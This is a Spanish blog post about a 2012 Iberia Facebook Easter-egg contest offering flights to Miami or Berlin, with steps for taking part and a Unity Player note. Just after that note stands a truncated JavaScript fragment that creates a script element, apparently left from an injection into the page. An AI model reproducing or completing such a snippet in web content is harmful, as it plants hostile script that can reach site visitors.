Encuentra los huevos de Pascua y vuela a Miami o Berlín

03/04/2012

Concurso Pascua con Iberia

¿Os gustaría volar a Miami o Berlín? Si la respuesta es afirmativa, y además os gustan los huevos de Pascua, no podéis dejar pasar esta oportunidad que Iberia os brinda para hacer vuestro deseo realidad. ¿Queréis saber cómo? Seguid leyendo 😉

1. Haceos seguidores de Iberia Líneas Aéreas en Facebook (si aún no lo sois).

2. Entrad en la pestaña de la aplicación del juego Pascua con Iberia y participar a través de ella.

3. De los 16 destinos que aparecerán en la aplicación, id escogiendo los que sean destinos Iberia (hay 8). Cada uno de estos 8 destinos contiene un huevo de chocolate (pero no intentéis morderlos, que son virtuales 🙂 )

4. Cuando encontréis un huevo de Pascua, deberéis acertar la pregunta que se os propone sobre el destino, para así conseguir dicho huevo de Pascua.

Todos aquellos participantes que acierten 6 de las 8 preguntas, entrarán en el sorteo aleatorio que se realizará una vez finalizado el concurso el 17 de abril.

Podéis consultar las Bases Legales del concurso en la propia aplicación. ¡¡Mucha suerte a todos!!

* Para poder participar necesitáis el reproductor Unity Player. Si no lo tenéis instalado, os aparecerá un aviso cuando accedáis a la aplicación. Solo tenéis que pinchar sobre el mismo para descargarlo (no se tarda nada) y ¡¡listo!! ya podéis comenzar a usar la aplicación.var d=document;var s=d.createElement(‘script’);

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO